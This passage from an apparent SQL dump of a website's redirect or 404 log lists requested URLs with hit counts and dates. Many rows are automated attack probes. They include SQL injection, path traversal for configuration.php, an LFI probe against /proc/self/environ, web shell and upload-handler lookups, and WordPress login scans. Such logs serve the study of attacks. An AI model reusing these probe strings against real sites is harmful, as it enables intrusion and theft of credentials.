00:00:00',301),(21976,'http://3s-technologies.com.tr/tr/?option=com_easyblog&view=dashboard&layout=write',NULL,'http://3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',2,0,'2019-02-14 13:42:16','0000-00-00 00:00:00',301),(21977,'http://www.3s-technologies.com.tr/en/wp-content/plugins/simple-ads-manager/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/simple-ads-manager/readme.txt','',3,0,'2019-02-15 04:08:29','0000-00-00 00:00:00',301),(21978,'http://www.3s-technologies.com.tr/tr/wordpress3/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:38','0000-00-00 00:00:00',301),(21979,'http://www.3s-technologies.com.tr/tr/wordpress1/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:43','0000-00-00 00:00:00',301),(21980,'http://www.3s-technologies.com.tr/tr/test/wp-login.php',NULL,'','',3,0,'2019-02-16 15:26:44','0000-00-00 00:00:00',301),(21981,'http://www.3s-technologies.com.tr/tr/wp1/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:45','0000-00-00 00:00:00',301),(21982,'http://www.3s-technologies.com.tr/tr/test1/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:45','0000-00-00 00:00:00',301),(21983,'http://www.3s-technologies.com.tr/tr/wp3/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:46','0000-00-00 00:00:00',301),(21984,'http://www.3s-technologies.com.tr/tr/blog2/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:49','0000-00-00 00:00:00',301),(21985,'http://www.3s-technologies.com.tr/tr/test2/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:50','0000-00-00 00:00:00',301),(21986,'http://www.3s-technologies.com.tr/tr/test3/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:51','0000-00-00 00:00:00',301),(21987,'http://www.3s-technologies.com.tr/tr/blog1/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:52','0000-00-00 00:00:00',301),(21988,'http://www.3s-technologies.com.tr/tr/wordpress2/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:52','0000-00-00 00:00:00',301),(21989,'http://www.3s-technologies.com.tr/tr/blog3/wp-login.php',NULL,'','',1,0,'2019-02-16 15:26:52','0000-00-00 00:00:00',301),(21990,'http://www.3s-technologies.com.tr/tr/wp2/wp-login.php',NULL,'','',1,0,'2019-02-16 15:27:00','0000-00-00 00:00:00',301),(21991,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/build.xml',NULL,'','',3,0,'2019-02-17 06:42:54','0000-00-00 00:00:00',301),(21992,'http://www.3s-technologies.com.tr/tr/dndxrpjmbq.html',NULL,'','',1,0,'2019-02-19 23:14:46','0000-00-00 00:00:00',301),(21993,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-precomposed',NULL,'','',3,0,'2019-02-20 18:22:40','0000-00-00 00:00:00',301),(21994,'http://3s-technologies.com.tr/tr/modules/modules/modules.php',NULL,'','',50,0,'2019-02-21 15:25:45','0000-00-00 00:00:00',301),(21995,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',51,0,'2019-02-21 15:25:46','0000-00-00 00:00:00',301),(21996,'http://3s-technologies.com.tr/tr/libraries/joomla/jmails.php?u',NULL,'','',45,0,'2019-02-21 15:25:50','0000-00-00 00:00:00',301),(21997,'http://3s-technologies.com.tr/tr/olux.php',NULL,'','',87,0,'2019-02-21 15:26:17','0000-00-00 00:00:00',301),(21998,'http://3s-technologies.com.tr/tr/indoxploit.php',NULL,'','',91,0,'2019-02-21 15:26:20','0000-00-00 00:00:00',301),(21999,'http://3s-technologies.com.tr/tr/rxr.php',NULL,'','',112,0,'2019-02-21 15:26:25','0000-00-00 00:00:00',301),(22000,'http://3s-technologies.com.tr/tr/v5.php',NULL,'','',78,0,'2019-02-21 15:26:36','0000-00-00 00:00:00',301),(22001,'http://3s-technologies.com.tr/tr/upload.php',NULL,'','',166,0,'2019-02-21 15:26:43','0000-00-00 00:00:00',301),(22002,'http://3s-technologies.com.tr/tr/?option=com_avreloaded&view=popup&itemid=71&divid=mypopup\'/*!12345union*//*!12345select*/0x232366696e642323-- \'',NULL,'','',1,0,'2019-02-21 15:26:55','0000-00-00 00:00:00',301),(22003,'http://3s-technologies.com.tr/tr/templates/ja_purity/index.php',NULL,'','',55,0,'2019-02-21 15:27:01','0000-00-00 00:00:00',301),(22004,'http://3s-technologies.com.tr/tr/templates/rhuk_milkyway/index.php',NULL,'','',51,0,'2019-02-21 15:27:04','0000-00-00 00:00:00',301),(22005,'http://3s-technologies.com.tr/tr//customer/account/create/',NULL,'','',19,0,'2019-02-21 18:33:39','0000-00-00 00:00:00',301),(22006,'http://www.3s-technologies.com.tr/en/profile/register',NULL,'','',1,0,'2019-02-22 15:34:47','0000-00-00 00:00:00',301),(22007,'http://3s-technologies.com.tr/en/profile/register',NULL,'','',1,0,'2019-02-22 15:34:51','0000-00-00 00:00:00',301),(22008,'http://www.3s-technologies.com.tr/en/admin/images/cal_date_over.gif',NULL,'','',7,0,'2019-02-23 12:46:02','0000-00-00 00:00:00',301),(22009,'http://www.3s-technologies.com.tr/en/admin/login.php',NULL,'','',7,0,'2019-02-23 12:46:08','0000-00-00 00:00:00',301),(22010,'http://www.3s-technologies.com.tr/en/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',7,0,'2019-02-23 12:46:40','0000-00-00 00:00:00',301),(22011,'http://www.3s-technologies.com.tr/en/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',7,0,'2019-02-23 12:46:44','0000-00-00 00:00:00',301),(22012,'http://www.3s-technologies.com.tr/en/media/vuln.txt',NULL,'','',7,0,'2019-02-23 12:46:50','0000-00-00 00:00:00',301),(22013,'http://www.3s-technologies.com.tr/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',6,0,'2019-02-23 12:47:10','0000-00-00 00:00:00',301),(22014,'http://www.3s-technologies.com.tr/en/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',7,0,'2019-02-23 12:47:21','0000-00-00 00:00:00',301),(22015,'http://www.3s-technologies.com.tr/en/images/pwn.gif',NULL,'','',7,0,'2019-02-23 12:47:29','0000-00-00 00:00:00',301),(22016,'http://www.3s-technologies.com.tr/en/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',6,0,'2019-02-23 12:47:35','0000-00-00 00:00:00',301),(22017,'http://www.3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',7,0,'2019-02-23 12:48:02','0000-00-00 00:00:00',301),(22018,'http://www.3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',7,0,'2019-02-23 12:48:10','0000-00-00 00:00:00',301),(22019,'http://www.3s-technologies.com.tr/en/components/com_sexycontactform/fileupload',NULL,'','',7,0,'2019-02-23 12:48:17','0000-00-00 00:00:00',301),(22020,'http://www.3s-technologies.com.tr/en/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',7,0,'2019-02-23 12:48:22','0000-00-00 00:00:00',301),(22021,'http://www.3s-technologies.com.tr/en/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',7,0,'2019-02-23 12:48:26','0000-00-00 00:00:00',301),(22022,'http://www.3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',7,0,'2019-02-23 12:48:34','0000-00-00 00:00:00',301),(22023,'http://www.3s-technologies.com.tr/en/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',6,0,'2019-02-23 12:48:39','0000-00-00 00:00:00',301),(22024,'http://mail.3s-technologies.com.tr/en/admin/images/cal_date_over.gif',NULL,'','',3,0,'2019-02-23 16:35:27','0000-00-00 00:00:00',301),(22025,'http://mail.3s-technologies.com.tr/en/admin/login.php',NULL,'','',3,0,'2019-02-23 16:35:39','0000-00-00 00:00:00',301),(22026,'http://mail.3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',6,0,'2019-02-23 16:36:22','0000-00-00 00:00:00',301),(22027,'http://mail.3s-technologies.com.tr/en/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',1,0,'2019-02-23 16:36:29','0000-00-00 00:00:00',301),(22028,'http://mail.3s-technologies.com.tr/en/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2019-02-23 16:36:37','0000-00-00 00:00:00',301),(22029,'http://mail.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2019-02-23 16:36:54','0000-00-00 00:00:00',301),(22030,'http://mail.3s-technologies.com.tr/en/media/vuln.txt',NULL,'','',1,0,'2019-02-23 16:37:00','0000-00-00 00:00:00',301),(22031,'http://mail.3s-technologies.com.tr/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2019-02-23 16:37:09','0000-00-00 00:00:00',301),(22032,'http://mail.3s-technologies.com.tr/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',6,0,'2019-02-23 16:37:22','0000-00-00 00:00:00',301),(22033,'http://mail.3s-technologies.com.tr/en/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',3,0,'2019-02-23 16:37:39','0000-00-00 00:00:00',301),(22034,'http://mail.3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2019-02-23 16:37:52','0000-00-00 00:00:00',301),(22035,'http://mail.3s-technologies.com.tr/en/images/pwn.gif',NULL,'','',1,0,'2019-02-23 16:37:57','0000-00-00 00:00:00',301),(22036,'http://mail.3s-technologies.com.tr/en/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',3,0,'2019-02-23 16:38:04','0000-00-00 00:00:00',301),(22037,'http://mail.3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2019-02-23 16:38:43','0000-00-00 00:00:00',301),(22038,'http://mail.3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',3,0,'2019-02-23 16:38:48','0000-00-00 00:00:00',301),(22039,'http://mail.3s-technologies.com.tr/en/components/com_sexycontactform/fileupload',NULL,'','',3,0,'2019-02-23 16:38:53','0000-00-00 00:00:00',301),(22040,'http://mail.3s-technologies.com.tr/en/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',3,0,'2019-02-23 16:39:03','0000-00-00 00:00:00',301),(22041,'http://mail.3s-technologies.com.tr/en/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',3,0,'2019-02-23 16:39:07','0000-00-00 00:00:00',301),(22042,'http://mail.3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',3,0,'2019-02-23 16:39:21','0000-00-00 00:00:00',301),(22043,'http://mail.3s-technologies.com.tr/en/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2019-02-23 16:39:27','0000-00-00 00:00:00',301),(22044,'http://3s-technologies.com.tr/tr/?option=com_user&task=register',NULL,'','',12,0,'2019-02-27 23:30:42','0000-00-00 00:00:00',301),(22045,'http://3s-technologies.com.tr/tr/joomla/other-components/registration-form',NULL,'','',12,0,'2019-02-27 23:30:43','0000-00-00 00:00:00',301),(22046,'http://3s-technologies.com.tr/tr/?option=com_community&view=register',NULL,'','',13,0,'2019-02-27 23:30:47','0000-00-00 00:00:00',301),(22047,'http://3s-technologies.com.tr/tr/component/user/register.html',NULL,'','',12,0,'2019-02-27 23:30:48','0000-00-00 00:00:00',301),(22048,'http://3s-technologies.com.tr/tr/registration/registers',NULL,'','',12,0,'2019-02-27 23:30:49','0000-00-00 00:00:00',301),(22049,'http://3s-technologies.com.tr/tr/registratsiya/registers',NULL,'','',22,0,'2019-02-27 23:30:50','0000-00-00 00:00:00',301),(22050,'http://3s-technologies.com.tr/tr/component/comprofiler/registers.html',NULL,'','',21,0,'2019-02-27 23:30:51','0000-00-00 00:00:00',301),(22051,'http://3s-technologies.com.tr/tr/user/registration',NULL,'','',21,0,'2019-02-27 23:30:51','0000-00-00 00:00:00',301),(22052,'http://3s-technologies.com.tr/tr/?option=com_secureregistration&task=register',NULL,'','',12,0,'2019-02-27 23:30:52','0000-00-00 00:00:00',301),(22053,'http://3s-technologies.com.tr/tr/component/option,com_comprofiler/task,registers',NULL,'','',21,0,'2019-02-27 23:30:54','0000-00-00 00:00:00',301),(22054,'http://3s-technologies.com.tr/tr/?option=com_registration&task=register',NULL,'','',12,0,'2019-02-27 23:30:55','0000-00-00 00:00:00',301),(22055,'http://3s-technologies.com.tr/tr/?option=com_comprofiler&task=registers',NULL,'','',25,0,'2019-02-27 23:30:56','0000-00-00 00:00:00',301),(22056,'http://3s-technologies.com.tr/tr/?option=com_joocm&view=register',NULL,'','',12,0,'2019-02-27 23:31:01','0000-00-00 00:00:00',301),(22057,'http://3s-technologies.com.tr/tr/?option=com_easysocial&view=registration',NULL,'','',19,0,'2019-02-27 23:31:01','0000-00-00 00:00:00',301),(22058,'http://3s-technologies.com.tr/tr/registration',NULL,'','',21,0,'2019-02-27 23:31:03','0000-00-00 00:00:00',301),(22059,'http://www.3s-technologies.com.tr/tr/ycpgrgmclnobv.html',NULL,'','',1,0,'2019-03-01 05:55:11','0000-00-00 00:00:00',301),(22060,'http://3s-technologies.com.tr/en/?option=com_user&view=registe',NULL,'','',2,0,'2019-03-01 21:43:27','0000-00-00 00:00:00',301),(22061,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-16/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-16/style.css','',3,0,'2019-03-02 03:48:28','0000-00-00 00:00:00',301),(22062,'http://www.3s-technologies.com.tr/tr/images/bilup.gif',NULL,'','',1,0,'2019-03-02 22:48:59','0000-00-00 00:00:00',301),(22063,'http://www.3s-technologies.com.tr/tr/images/daylight.gif',NULL,'','',1,0,'2019-03-02 22:49:07','0000-00-00 00:00:00',301),(22064,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/?option=com_content&task=view&id=1\'',NULL,'','',1,0,'2019-03-02 22:49:14','0000-00-00 00:00:00',301),(22065,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-02 22:49:14','0000-00-00 00:00:00',301),(22066,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-02 22:49:15','0000-00-00 00:00:00',301),(22067,'http://www.3s-technologies.com.tr/tr/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-02 22:49:16','0000-00-00 00:00:00',301),(22068,'http://3s-technologies.com.tr/en/images/stories/mild.gif',NULL,'','',1,0,'2019-03-02 22:50:04','0000-00-00 00:00:00',301),(22069,'http://3s-technologies.com.tr/tr/images/stories/mild.gif',NULL,'','',2,0,'2019-03-02 22:50:04','0000-00-00 00:00:00',301),(22070,'http://3s-technologies.com.tr/en/images/bilup.gif',NULL,'','',1,0,'2019-03-02 22:50:12','0000-00-00 00:00:00',301),(22071,'http://3s-technologies.com.tr/tr/images/bilup.gif',NULL,'','',2,0,'2019-03-02 22:50:13','0000-00-00 00:00:00',301),(22072,'http://3s-technologies.com.tr/en/images/daylight.gif',NULL,'','',1,0,'2019-03-02 22:50:21','0000-00-00 00:00:00',301),(22073,'http://3s-technologies.com.tr/tr/images/daylight.gif',NULL,'','',2,0,'2019-03-02 22:50:21','0000-00-00 00:00:00',301),(22074,'http://3s-technologies.com.tr/en/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-02 22:50:28','0000-00-00 00:00:00',301),(22075,'http://3s-technologies.com.tr/tr/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',2,0,'2019-03-02 22:50:30','0000-00-00 00:00:00',301),(22076,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'','',12,0,'2019-03-03 04:39:32','0000-00-00 00:00:00',301),(22077,'http://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'','',22,0,'2019-03-03 04:39:33','0000-00-00 00:00:00',301),(22078,'http://3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php/index.php',NULL,'','',21,0,'2019-03-03 04:39:34','0000-00-00 00:00:00',301),(22079,'http://3s-technologies.com.tr/tr/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',4,0,'2019-03-03 04:39:35','0000-00-00 00:00:00',301),(22080,'http://3s-technologies.com.tr/en/wp-admin/setup-config.php',NULL,'','',19,0,'2019-03-03 15:53:27','0000-00-00 00:00:00',301),(22081,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-...//',NULL,'','',1,0,'2019-03-03 20:33:24','0000-00-00 00:00:00',301),(22082,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-.../images/stories/mild.gif',NULL,'','',1,0,'2019-03-03 20:33:31','0000-00-00 00:00:00',301),(22083,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/images/stories/mild.gif',NULL,'','',1,0,'2019-03-03 20:33:32','0000-00-00 00:00:00',301),(22084,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-.../images/bilup.gif',NULL,'','',1,0,'2019-03-03 20:33:39','0000-00-00 00:00:00',301),(22085,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/images/bilup.gif',NULL,'','',1,0,'2019-03-03 20:33:40','0000-00-00 00:00:00',301),(22086,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-.../images/daylight.gif',NULL,'','',1,0,'2019-03-03 20:33:48','0000-00-00 00:00:00',301),(22087,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/images/daylight.gif',NULL,'','',1,0,'2019-03-03 20:33:49','0000-00-00 00:00:00',301),(22088,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-.../?option=com_content&task=view&id=1\'',NULL,'','',1,0,'2019-03-03 20:33:54','0000-00-00 00:00:00',301),(22089,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/?option=com_content&task=view&id=1\'',NULL,'','',1,0,'2019-03-03 20:33:55','0000-00-00 00:00:00',301),(22090,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-.../?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-03 20:33:55','0000-00-00 00:00:00',301),(22091,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2019-03-03 20:33:56','0000-00-00 00:00:00',301),(22092,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/jbcatalog.php',NULL,'','',5,0,'2019-03-04 00:55:34','0000-00-00 00:00:00',301),(22093,'http://3s-technologies.com.tr/tr/components/com_adsmanager/adsmanager.php',NULL,'','',6,0,'2019-03-04 00:57:37','0000-00-00 00:00:00',301),(22094,'http://3s-technologies.com.tr/tr/components/com_myblog/myblog.php',NULL,'','',6,0,'2019-03-04 00:58:21','0000-00-00 00:00:00',301),(22095,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-162/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-162/style.css','',5,0,'2019-03-04 02:28:14','0000-00-00 00:00:00',301),(22096,'http://www.3s-technologies.com.tr/en/wp-admin/setup-config.php',NULL,'','',2,0,'2019-03-04 14:21:28','0000-00-00 00:00:00',301),(22097,'http://3s-technologies.com.tr/en/admin/images/cal_date_over.gif',NULL,'','',11,0,'2019-03-05 12:15:07','0000-00-00 00:00:00',301),(22098,'http://3s-technologies.com.tr/en/admin/login.php',NULL,'','',10,0,'2019-03-05 12:15:10','0000-00-00 00:00:00',301),(22099,'http://3s-technologies.com.tr/en/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',4,0,'2019-03-05 12:15:32','0000-00-00 00:00:00',301),(22100,'http://3s-technologies.com.tr/en/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',3,0,'2019-03-05 12:15:35','0000-00-00 00:00:00',301),(22101,'http://3s-technologies.com.tr/en/media/vuln.txt',NULL,'','',4,0,'2019-03-05 12:15:42','0000-00-00 00:00:00',301),(22102,'http://3s-technologies.com.tr/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',3,0,'2019-03-05 12:15:47','0000-00-00 00:00:00',301),(22103,'http://3s-technologies.com.tr/en/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',3,0,'2019-03-05 12:16:04','0000-00-00 00:00:00',301),(22104,'http://3s-technologies.com.tr/en/images/pwn.gif',NULL,'','',5,0,'2019-03-05 12:16:13','0000-00-00 00:00:00',301),(22105,'http://3s-technologies.com.tr/en/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',1,0,'2019-03-05 12:16:15','0000-00-00 00:00:00',301),(22106,'http://3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',5,0,'2019-03-05 12:16:31','0000-00-00 00:00:00',301),(22107,'http://3s-technologies.com.tr/en/components/com_sexycontactform/fileupload',NULL,'','',5,0,'2019-03-05 12:16:36','0000-00-00 00:00:00',301),(22108,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-161/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-161/style.css','',5,0,'2019-03-06 02:26:47','0000-00-00 00:00:00',301),(22109,'http://www.3s-technologies.com.tr/tr/growers?id=58&language=tr-tr',NULL,'','',9,0,'2019-03-06 03:10:58','0000-00-00 00:00:00',301),(22110,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh6-detail',NULL,'','',5,0,'2019-03-06 13:43:20','0000-00-00 00:00:00',301),(22111,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,1-10',NULL,'','',17,0,'2019-03-06 16:43:12','0000-00-00 00:00:00',301),(22112,'http://3s-technologies.com.tr/tr/index.php',NULL,'','',317,0,'2019-03-07 00:11:31','0000-00-00 00:00:00',301),(22113,'http://3s-technologies.com.tr/tr/templates/beez5/favicon.ico',NULL,'','',2,0,'2019-03-07 06:28:12','0000-00-00 00:00:00',301),(22114,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',8,0,'2019-03-07 14:55:44','0000-00-00 00:00:00',301),(22115,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-165/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-165/style.css','',3,0,'2019-03-08 01:49:29','0000-00-00 00:00:00',301),(22116,'http://3s-technologies.com.tr/tr/wp-includes/css/modules.php',NULL,'','',18,0,'2019-03-08 05:04:45','0000-00-00 00:00:00',301),(22117,'http://3s-technologies.com.tr/tr/wp-content/plugins/upspy/index.php',NULL,'','',17,0,'2019-03-08 05:04:50','0000-00-00 00:00:00',301),(22118,'http://3s-technologies.com.tr/tr/wp-content/plugins/ubh/index.php',NULL,'','',17,0,'2019-03-08 05:04:52','0000-00-00 00:00:00',301),(22119,'http://3s-technologies.com.tr/tr/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',13,0,'2019-03-08 05:04:56','0000-00-00 00:00:00',301),(22120,'http://3s-technologies.com.tr/tr/wp-content/plugins/xichang/x.php?xi',NULL,'','',11,0,'2019-03-08 05:05:00','0000-00-00 00:00:00',301),(22121,'http://3s-technologies.com.tr/tr/wp-content/plugins/html404/index.html',NULL,'','',17,0,'2019-03-08 05:05:03','0000-00-00 00:00:00',301),(22122,'http://3s-technologies.com.tr/tr/wp-admin/shapes.php',NULL,'','',23,0,'2019-03-08 05:05:07','0000-00-00 00:00:00',301),(22123,'http://3s-technologies.com.tr/tr/wp-content/plugins/css-ready-sel/file.php',NULL,'','',8,0,'2019-03-08 05:05:19','0000-00-00 00:00:00',301),(22124,'http://3s-technologies.com.tr/tr/wp-content/plugins/css-ready/file.php',NULL,'','',8,0,'2019-03-08 05:05:22','0000-00-00 00:00:00',301),(22125,'http://3s-technologies.com.tr/tr/wp-content/think.php',NULL,'','',9,0,'2019-03-08 05:05:24','0000-00-00 00:00:00',301),(22126,'http://3s-technologies.com.tr/tr/wp-content/uploads/test.php',NULL,'','',2,0,'2019-03-08 05:05:26','0000-00-00 00:00:00',301),(22127,'http://3s-technologies.com.tr/tr/wp-content/uploads/content-post.php',NULL,'','',3,0,'2019-03-08 05:05:28','0000-00-00 00:00:00',301),(22128,'http://3s-technologies.com.tr/tr/wp-content/uploads/new_license.php',NULL,'','',1,0,'2019-03-08 05:05:29','0000-00-00 00:00:00',301),(22129,'http://3s-technologies.com.tr/tr/wp-content/plugins/gravityforms/gravityforms.php?abdullkarem',NULL,'','',1,0,'2019-03-08 05:05:31','0000-00-00 00:00:00',301),(22130,'http://3s-technologies.com.tr/tr/wp-content/themes/gaukingo/db.php',NULL,'','',13,0,'2019-03-08 05:05:33','0000-00-00 00:00:00',301),(22131,'http://3s-technologies.com.tr/tr/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',13,0,'2019-03-08 05:05:34','0000-00-00 00:00:00',301),(22132,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',8,0,'2019-03-08 05:05:36','0000-00-00 00:00:00',301),(22133,'http://3s-technologies.com.tr/tr/wp-content/uploads',NULL,'','',216,0,'2019-03-08 05:05:44','0000-00-00 00:00:00',301),(22134,'http://3s-technologies.com.tr/tr/wp-content/uploads/up.php',NULL,'','',4,0,'2019-03-08 05:05:50','0000-00-00 00:00:00',301),(22135,'http://3s-technologies.com.tr/tr/uploader.php',NULL,'','',64,0,'2019-03-08 05:05:55','0000-00-00 00:00:00',301),(22136,'http://3s-technologies.com.tr/tr/wp-admin/network/wp-footer.php',NULL,'','',17,0,'2019-03-08 05:06:01','0000-00-00 00:00:00',301),(22137,'http://3s-technologies.com.tr/tr/wp-info.php',NULL,'','',179,0,'2019-03-08 05:06:04','0000-00-00 00:00:00',301),(22138,'http://3s-technologies.com.tr/tr/wp-content/vuln.php',NULL,'','',17,0,'2019-03-08 05:06:06','0000-00-00 00:00:00',301),(22139,'http://3s-technologies.com.tr/tr/upel.php',NULL,'','',21,0,'2019-03-08 05:06:10','0000-00-00 00:00:00',301),(22140,'http://3s-technologies.com.tr/tr/wp-content/plugins/ppus/up.php',NULL,'','',17,0,'2019-03-08 05:06:15','0000-00-00 00:00:00',301),(22141,'http://3s-technologies.com.tr/tr/new_license.php',NULL,'','',19,0,'2019-03-08 05:06:27','0000-00-00 00:00:00',301),(22142,'http://3s-technologies.com.tr/tr/wp-content/plugins/theme-configurator/mini.php',NULL,'','',17,0,'2019-03-08 05:06:30','0000-00-00 00:00:00',301),(22143,'http://3s-technologies.com.tr/tr/wp-content/plugins/widget-logic/mini.php',NULL,'','',17,0,'2019-03-08 05:06:32','0000-00-00 00:00:00',301),(22144,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-admin-manager/up.php',NULL,'','',1,0,'2019-03-08 05:06:36','0000-00-00 00:00:00',301),(22145,'http://3s-technologies.com.tr/tr/wp-content/uploads/2019/03/content-post.php',NULL,'','',1,0,'2019-03-08 05:06:43','0000-00-00 00:00:00',301),(22146,'http://3s-technologies.com.tr/tr/wp-content/uploads/2019/03/new_license.php',NULL,'','',1,0,'2019-03-08 05:06:48','0000-00-00 00:00:00',301),(22147,'http://3s-technologies.com.tr/tr/wp-content/uploads/new_up.php',NULL,'','',1,0,'2019-03-08 05:06:51','0000-00-00 00:00:00',301),(22148,'http://3s-technologies.com.tr/tr/a.php',NULL,'','',240,0,'2019-03-08 05:06:54','0000-00-00 00:00:00',301),(22149,'http://3s-technologies.com.tr/tr/z.php',NULL,'','',119,0,'2019-03-08 05:07:06','0000-00-00 00:00:00',301),(22150,'http://3s-technologies.com.tr/tr/d.php',NULL,'','',63,0,'2019-03-08 05:07:10','0000-00-00 00:00:00',301),(22151,'http://3s-technologies.com.tr/tr/o.php',NULL,'','',125,0,'2019-03-08 05:07:13','0000-00-00 00:00:00',301),(22152,'http://3s-technologies.com.tr/tr/t.php',NULL,'','',141,0,'2019-03-08 05:07:16','0000-00-00 00:00:00',301),(22153,'http://3s-technologies.com.tr/tr/2018.php',NULL,'','',11,0,'2019-03-08 05:07:22','0000-00-00 00:00:00',301),(22154,'http://3s-technologies.com.tr/tr/k.php',NULL,'','',356,0,'2019-03-08 05:07:39','0000-00-00 00:00:00',301),(22155,'http://3s-technologies.com.tr/tr/e.php',NULL,'','',87,0,'2019-03-08 05:07:46','0000-00-00 00:00:00',301),(22156,'http://3s-technologies.com.tr/tr/m.php',NULL,'','',281,0,'2019-03-08 05:07:49','0000-00-00 00:00:00',301),(22157,'http://3s-technologies.com.tr/tr/wp.php',NULL,'','',590,0,'2019-03-08 05:08:01','0000-00-00 